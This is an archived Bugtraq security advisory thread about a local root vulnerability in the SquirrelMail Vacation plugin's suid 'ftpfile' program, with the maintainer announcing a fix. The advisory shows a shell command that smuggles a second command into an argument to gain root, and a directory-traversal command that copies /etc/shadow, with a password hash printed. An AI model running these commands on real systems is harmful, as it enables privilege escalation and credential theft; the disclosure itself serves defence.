Bugtraq mailing list archives
Re: Squirrelmail vacation v0.15 local root exploit
From: p dont think <pdontthink () angrynerds com>
Date: Thu, 03 Feb 2005 20:13:31 -0800
All,A new release of this plugin that addresses this exploit is now available at:
http://www.squirrelmail.org/plugin_view.php?id=51Due to the severity of the exploits in prior versions, upgrade is highly recommended. Also, please keep in mind that while the SquirrelMail team takes security very seriously, it cannot take full responsibility for the plethora of third-party plugins, of which this is one. LSS team: pleeeease let us know *before* you are going to make your announcement next time.
- Paul Lesneiwski
LSS Security Advisory #LSS-2005-01-03 http://security.lss.hr ---Title : Squirrelmail vacation v0.15 local root exploit Advisory ID : LSS-2005-01-03 Date : 10.01.2005. Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03Impact : Privilege escalation and arbitrary file readRisk level : High Vulnerability type : LocalVendors contacted : No response from vendor ---===[ OverviewVacation plugin for Squirrelmail allows UNIX users to set an auto-replymessage to incoming email. That is commonly used to notify the sender of the receiver's absence. Vacation plugin specifically uses the Vacation program.Plugin can be downloaded from: http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz ===[ Vulnerability Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'. The program is used to access local files in user's home directory. There isa privilege escalation and arbitrary file read vulnerability in ftpfile. Command line arguments are passed to execve() function without checkingfor meta-characters, therefore making possible execution of commands as root. [ljuranic@laptop ljuranic]$ id uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic) [ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id" /bin/cp: omitting directory `/root/0' uid=0(root) gid=513(ljuranic) groups=513(ljuranic)[ljuranic@laptop ljuranic]$It is also possible to read restricted files (such as /etc/shadow), since ftpfile can copy a file from user's home directory to any other directory without checking file name for directory traversal attack. $ ftpfile localhost root root get ../../../../etc/shadow ./shadow ./shadow[ljuranic@laptop ljuranic]$ head ./shadow root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7::: bin:*:10929:0:99999:7::: daemon:*:10929:0:99999:7::: lp:*:10929:0:99999:7:::[ljuranic@laptop ljuranic]$===[ Affected versions Squirrelmail Vacation v0.15 and previous versions. ===[ Fix Not available yet. ===[ PoC Exploit http://security.lss.hr/exploits/ ===[ CreditsCredits for this vulnerability goes to Leon Juranic.===[ LSS Security ContactLSS Security Team, <eXposed by LSS> WWW : http://security.lss.hrE-mail : security () LSS hr Tel : +385 1 6129 775
Current thread:
- Re: Squirrelmail vacation v0.15 local root exploit p dont think (Feb 04)